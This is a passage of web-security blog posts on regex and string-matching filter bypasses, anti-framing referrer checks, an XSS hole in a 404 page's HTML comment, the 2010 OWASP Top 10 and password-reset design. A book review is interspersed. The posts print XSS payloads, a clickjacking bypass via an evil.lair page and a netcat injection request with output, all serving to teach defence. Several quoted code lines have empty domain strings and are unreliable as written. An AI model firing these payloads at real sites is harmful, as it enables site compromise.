90210' alert(0x42)57732 10118alert(0x42)

Poor Wilberforce’s unanchored pattern finds a matching string in all three cases, thereby allowing the malicious content through the filter and enabling Agatha to compromise the site. If the pattern had been anchored to match the complete input string from beginning to end then the filter wouldn’t have failed so spectacularly:


Unravelling Strings

Even basic string-matching approaches can fall victim to the unanchored problem; after all they’re nothing more than regex patterns without the syntax for wildcards, alternation, and grouping. Let’s go back to the Stanford paper for an example of’s document.referrer check based on a JavaScript String object’s IndexOf function. This function returns the first position in the input string of the argument or -1 in case the argument isn’t found:

if(top.location != location) {
  if(document.referrer && document.referrer.indexOf("") == -1) {

Sigh. As long as the document.referrer contains the string “” the anti-framing code won’t trigger. For Agatha, the bypass is as simple as putting her booby-trapped clickjacking page on a site with a domain name like “” or maybe using a URI fragment, https://evil.lair/ The developers neglected to ensure that the host from the referrer URI ends in rather than merely contains

The previous sentence is very important. The referrer string isn’t supposed to end in, the referrer’s host is supposed to end with that domain. That’s an important distinction considering the bypass techniques we’ve already mentioned:

Parsers Before Patterns

Input validation filters often require an understanding of a data type’s grammar. Some times this is simple, such as a five digit zip code. More complex cases, such as email addresses and URIs, require that the input string be parsed before pattern matching is applied.

The previous indexOf string example failed because it doesn’t actually parse the referrer’s URI; it just looks for the presence of a string. The regex pattern in the example was superior because it at least tried to understand the URI grammar by matching content between the URI’s scheme (http or https) and the first slash (/)1.

A good security filter must understand the context of the pattern to be matched. The improved referrer check is shown below. Notice that the get_hostname_from_url function now uses a regex to extract the host name from the referrer’s URI and the string comparison ensures the host name either exactly matches or ends with “”. (You could quibble that the regex in get_hostname_from_url isn’t anchored, but in this case the pattern works because it’s not possible to smuggle malicious content inside the URI’s scheme. The pattern would fail if it returned the last match instead of the first match. And, yes, the typo in the comment in the killFrames function is in the original JavaScript.)

function killFrames() {
  if(top.location != location) {
    if(document.referrer) {
      var referrerHostname = get_hostname_from_url(document.referrer);
      var strLength = referrerHostname.length;
      if((strLength == 11)
         && (referrerHostname != "")) { // to take care of url - length of "" string is 11.
      else if(strLength != 11
              && referrerHostname.substring(referrerHostname.length - 12) != "") { // length of "" string is 12.

function get_hostname_from_url(url) {
  return url.match(/:\/\/(.[^/?]+)/)[1];


Regexes and string matching functions are ubiquitous throughout web applications. If you’re implementing security filters with these functions, keep these points in mind:

Normalize the character set. Ensure the string functions and regex patterns match the character encoding, e.g. multi-byte string functions for multi-byte sequences.

Always match the entire input string. Anchor patterns to the start (^) and end ($) of input strings. If you expect input strings to include multiple lines, understand how multiline (?m) and single line (?s) flags will affect the pattern – if you’re not sure then treat it as a single line. Where appropriate to the context, the results of string matching functions should be tested to see if the match occurred at the beginning, within, or end of a string.

Prefer a positive security model over a negative one. Define what you want to explicitly accept rather than what to reject.

Allow content that you expect to receive and deny anything that doesn’t fit. Allow list filters should be as strict as possible to avoid incorrectly matching malicious content. If you go the route of deny listing content, make the patterns as lenient as possible to better match unexpected scenarios – an attacker may have an encoding technique or JavaScript trick you’ve never heard of.

Consider a parser instead of a regex. If you want to match a URI attribute, make sure your pattern extracts the right value. URIs can be complex. If you’re trying to use regexes to parse HTML content…good luck.

Don’t shy away from regexes because their syntax looks daunting, just remember to test your patterns against a wide array of malicious and valid input strings.

  1. Technically, the pattern should match the host portion of the URI’s authority. Check out RFC 3986 for specifics, especially the regexes mentioned in Appendix B. 

At about this time...

“When a day that you happen to know is Wednesday starts off by sounding like Sunday, there is something seriously wrong somewhere.”

Bill Masen’s day only worsens as he tries to survive the apocalyptic onslaught of mobile, venomous plants.
John Wyndham’s The Day of the Triffids doesn’t feel like an outdated menace even though the book was published in 1951. Furthermore, the central character’s initial condition serves as an excellent hook that gives both a brief history of the triffids and underlies the high tension with which the book starts off. Where Cormac McCarthy’s The Road focuses on the harshness of personal survival and meaning after an apocalypse, Triffids considers the ways a society might try to emerge from one.

The 1981 BBC adaption stays very close the book’s plot and pacing. Read the book first, as the time-capsule aspect of the mini-series might distract you – 80’s hair styles, control panels, and lens flares. If you’ve been devoted to Doctor Who since the Tom Baker era (or before), you’ll feel right at home.

Is a vuln without a useful exploit still a vuln?

Here’s a case where a page has one of the simplest types of XSS vulnerabilities: A server echoes the querystring verbatim in the HTTP response. The payload shows up inside an HTML comment labeled “Request Query String”. The site’s developers claim the comment prevents XSS because browsers will not execute the JavaScript, as below:

<!-- _not gonna' happen_ -->

One exploit technique would be to terminate the comment opener with “ –>” (space dash dash >). Use netcat to make the raw HTTP request (for some reason, though likely related to the space, the server doubles the payload1):

$ echo -e "GET /nexistepas.cgi? --> HTTP/1.0\r\nHost:\r\n" | nc 80 | tee response.html
<!-- === Request URI: /abc/def/error/404.jsp -->
<!-- === Request Query String: pageType=error&emptyPos=100&isInSecureMode=false& --> --> -->
<!-- === Include URI: /abc/def/cmsTemplates/def_headerInclude_1_v3.jsp -->

You can confirm this works by viewing the HTML source in Mozilla to see its syntax highlighting pick up the tags (yes, you could just as easily pop an alert window).

html injection

The server is clearly vulnerable to XSS because it renders the exact payload. The HTML comments were a poor countermeasure because they could be easily closed by including a few extra characters in the payload. This also shows why I prefer the term HTML injection since it describes the underlying effect more accurately.

However, there’s a major problem of effective exploitability: The attack uses illegal HTTP syntax.2 Though the payload works when sent with netcat, a browser applies URL encoding to the payload’s important characters, thereby rendering the it ineffective because the payload loses the literal characters necessary to modify the HTML: -->
<!-- === Request URI: /abc/def/error/404.jsp -->
<!-- === Request Query String: pageType=error&emptyPos=100&isInSecureMode=false&%20--%3e%3cscript%3e%3c/script%3e -->
<!-- === Include URI: /abc/def/cmsTemplates/def_headerInclude_1_v3.jsp -->

I tried Mozilla’s XMLHttpRequest object to see if it might subvert the encoding issue, but didn’t have any luck. Browsers are smart enough to apply URL encoding for all requests, thus defeating this possible trick:

var req = new XMLHttpRequest();'GET', ' --><scri' + 'pt></s' + 'cript>', false);

The developers are correct to claim that HTML comments prevent <script> tags from being executed, but that has nothing to do with protecting this web site. It’s like saying you can escape Daleks by using the stairs; they’ll just level the building.

Daleks cartoon

The page’s only protection comes from the fact that browsers will always encode the space character. If the page were to decode percent-encoded characters or there was a way to make the raw request with a space, then the page would be trivially exploited. The real solution for this vulnerability is to apply HTML encoding or percent encoding to the querystring when it’s written to the page.

Set aside whether the vulnerability is exploitable or not. The 404 message in this situation clearly has a bug. Bugs should be fixed. The time spent arguing over risks, threats, and feasibility far outweighs the time required to create a patch. If the effort of pushing out a few lines of code cripples your web development process, then it’s probably a better idea to put more effort into figuring out why the process is broken. Notice that I didn’t mention the timeline for the patch. The release cycle might necessitate a few days or a few weeks to validate the change. On the other hand, if minor changes cause panic about uptime and require months to test and apply, then you don’t have a good web development process – something far more hazardous to the site’s long-term security.

  1. Weird behavior like this is always interesting. Why would the querystring be repeated? What implications does this have for other types of attacks? 

  2. Section 5.1 of RFC 2616 specifies the format of a request line must be as follows (SP indicates whitespace characters): Request-Line = Method SP Request-URI SP HTTP-Version CRLF Including spurious space characters within the request line might elicit errors from the web server and is a worthy test case, but you’ll be hard-pressed to convince a standards-conformant browser to include a space in the URI. 

30% of the 2010 OWASP Top 10 not common, only 1 not hard to detect

Letter O

One curious point about the new 2010 OWASP Top 10 Application Security Risks is that 30% of them aren’t even common. The “Weakness Prevalence” for each of Insecure Cryptographic Storage (A7), Failure to Restrict URL Access (A8), and Unvalidated Redirects and Forwards (A10) is rated uncommon. That doesn’t mean that an uncommon risk can’t be a critical one; these three points highlight the challenge of producing an unbiased list and conveying risk.

Risk is complex and difficult to quantify. The OWASP Top 10 includes a What’s My Risk? section that provides guidance on how to interpret the list. The list is influenced by the experience of people who perform penetration tests, code reviews, or conduct research on web security.

The Top 10 rates Insecure Cryptographic Storage (A7) with an uncommon prevalence and difficult to detect. One of the reasons it’s hard to detect is that back-end storage schemes can’t be reviewed by blackbox scanners (i.e. web scanners) nor can source code scanners point out these problems other than by indicating misuse of a language’s crypto functions. So, one interpretation is that insecure crypto is uncommon only because more people haven’t discovered or revealed such problems. Yet not salting a password hash is one of the most egregious mistakes a web app developer can make and one of the easier problems to fix – the practice of salting password hashes has been around since Unix epoch time was in single digits.

It’s also interesting that insecure crypto is the only one on the list that’s rated difficult to detect. On the other hand, Cross-Site Scripting (A2) is “very widespread” and “easy” to detect. But maybe it’s very widespread because it’s so trivial to find. People might simply focus on searching for vulns that require minimal tools and skill to discover. Alternately, XSS might be very widespread because it’s not easy to find in a way that scales with development or keeps up with the complexity of web apps. (Of course, this assumes that devs are looking for it in the first place.) XSS tends to be easy for manual testing, whereas scanners need to effectively crawl an app before they can go through their own detection techniques.

Broken Authentication and Session Management (A3) covers brute force attacks against login pages. It’s an item whose risk is too-often demonstrated by real-world attacks. In 2010 the Apache Foundation suffered an attack that relied on brute forcing a password. (Apache’s network had a similar password-driven intrusion in 2001. These events are mentioned because of the clarity of their postmortems, not to insinuate that the org inherently insecure.) In 2009 Twitter provided happiness to another password guesser.

Knowing the password to an account is the best way to pilfer a user’s data and gain unauthorized access to a site. The only markers for an attacker using valid credentials are behavioral patterns – time of day the account was accessed, duration of activity, geographic source of the connection, etc. The attacker doesn’t have to use any malicious characters or techniques that could trigger XSS or SQL injection countermeasures.

The impact of a compromised password is similar to how CSRF (A5) works. The nature of a CRSF attack is to force a victim’s browser to make a request to the target app using the context of the victim’s authenticated session in order to perform some action within the app. For example, a CSRF attack might change the victim’s password to a value chosen by the attacker, or update the victim’s email to one owned by the attacker.

By design, browsers make many requests without direct interaction from a user (such as loading images, CSS, JavaScript, and iframes). CSRF requires the victim’s browser to visit a booby-trapped page, but doesn’t require the victim to click anything. The target web app neither sees the attacker’s traffic nor even suspects the attacker’s activity because all of the interaction occurs between the victim’s browser and the app.

CSRF serves as a good example of the changing nature of the web security industry. CSRF vulnerabilities have existed as long as the web. The attack takes advantage of the fundamental nature of HTML and HTTP whereby browsers automatically load certain types of resources. Importantly, the attack just needs to build a request. It doesn’t need to read the response, hence it isn’t inhibited by the Same Origin Policy.

CSRF hopped on the Top 10 list’s revision in 2007, three years after the list’s first appearance. It’s doubtful that CSRF vulnerabilities were any more or less prevalent over that three year period (or even the before 2000). Its inclusion was a nod to having a better understanding and appreciation of the risk associated with the vuln. And it’s a risk that’s likely to increase when the pool of victims can be measured in the hundreds of millions rather than the hundreds of thousands.

This vuln also highlights an observation bias of security researchers. Now that CSRF is in vogue people start to look for it everywhere. Security conferences get more presentations about advanced ways to exploit the vulnerability, even though real-world attackers seem fine with the returns on guessing passwords, seeding web pages with malware, and phishing. Take a look at HTML injection (what everyone else calls XSS). Injecting script tags into a web page via an unchecked parameter dates back to the beginning of the web.

Before you shrug off this discussion of CSRF as hand waving with comments like, “But I could hack site Foo by doing Bar and then make lots of money,” consider what you’re arguing: A knowledgeable or dedicated attacker will find a useful exploit. Risk may include many components, including Threat Agents (to use the Top 10’s term). Risk increases under a targeted attack – someone actively looking to compromise the app or its users’ data. If you want to add an “Exploitability” metric to your risk calculation, keep in mind that ease of exploitability is often related to the threat agent and tends to be a step function: It might be hard to figure out the exploit in the first place, but anyone can run a 42-line Python script that automates the attack.

This is why the Top 10 list should be a starting point to defining security practices for your web site, but it shouldn’t be the end of the road. Even the OWASP site admonishes readers to use the list for awareness rather than policy. So, if you’ve been worried about information leakage and improper error handling since 2007 don’t think the problem has disappeared because it’s not on the list in 2010.

The alien concept of password security

A post on Stack Overflow1 seeks advice on the relative security between implementing a password reset mechanism that emails a temporary link vs. one that emails a temporary password. The question brings to mind some issues addressed in Chapter 5: Breaking Authentication Schemes of The Book. Stack Overflow questions typically attract high quality answers, which is a testament to the site’s knowledgeable readership and reputation system. Responses to this particular post didn’t fail.

Rather than retread the answers, let’s consider the underlying implication behind the question: it can be acceptable to send passwords via email.

Don’t do it. Don’t give users the expectation that passwords might be sent via email. Doing so is unnecessary and establishes a dangerous practice as possibly acceptable. If the site ever sends a password to a user, then the user might be conditioned to communicate in the other direction. An email purportedly from the site’s administrators might ask for the user’s password to “verify the account is active”, “prevent the account from being terminated”, or “restore information”. The email need not ask for a direct response. It may be an indirect prompt for the password using cautionary, concerned language that never the less sends the victim to a spoofed login page.

Site administrators will not elicit passwords via email or any other means. Sites won’t ask for passwords except at authentication barriers. Sites shouldn’t send passwords – however temporary they may be.

“Newt. My name’s Newt.”

Passwords – shared secrets ostensibly known only to the user and the web site – are a necessary evil of authentication. The password proves a user’s identity to a web site under the assumption that only the person who logs in as Newt, for example, knows the corresponding password to the account is rebecca.

A password’s importance to web security has a frustratingly indirect relationship to the amount of control a site is able to exert over its protection. Users must be trusted not only to use hard-to-guess words or phrases, but must be trusted not to share the password or otherwise actively divulge it through accident or ignorance. Only the luckiest of potential victims will click an emailed link and be brought to a friendly page:


“That’s it man, game over man, game over!”

Password reuse among sites poses another serious risk. The theft of a user’s credentials (email address and password) for a site like might seen relatively innocuous, but what if they’re the same credentials used for or Even worse, what if the password matches the one for the Gmail, Hotmail, or Yahoo account? In that case: Nuke the entire site from orbit. It’s the only way to be sure.”

“Seventeen days? Hey man, I don’t wanna rain on your parade, but we’re not gonna last seventeen hours!”

Use random, temporary links for password reset mechanisms via email. By this point you should be sufficiently warned off of the alternative of emailing temporary passwords. An obstinate few might choose to stick with passwords, arguing that there’s no difference between the two once they hit the unencrypted realm of email.

Instead, use a forward-thinking solution that tries to secure the entire reset process:

  • Maintain the original password until the user changes it. Perhaps they’ll remember it anyway. This also prevent a mini-denial of service where attackers force users to change their passwords.
  • Use a strong pseudo-random number generator to minimize the chance of success of brute force attacks guessing the link.
  • Expire the link after a short period of time, perhaps in minutes or hours. This narrows the window of opportunity for brute force attacks that attempt to guess links. It’s no good to let an attacker initiate a password reset on a Friday evening and have a complete weekend to brute force links until the victim notices the email on a Monday morning.

“Maybe we got ‘em demoralized.”

For those of you out there who visit web sites rather than create them there’s one rule you should never ignore. If the site’s password recovery mechanism emails you the original password for your account, then stop using the site. Period. Full stop. Should you be forced to use the site under threat of violence or peer pressure, whichever is worse, at the very least choose a password that isn’t shared with any other account. Storing unencrypted passwords is lazy, bad security design, and a liability.

Quotes from the movie Aliens. If you didn’t already know that, go watch it now. It’s worth it. See you in about two hours.

  1. Huzzah! A site name that doesn’t succumb to stripping spaces, prefixing an ‘e’ or ‘i’, or using some vapid, made-up word only because it consists of four or five letters!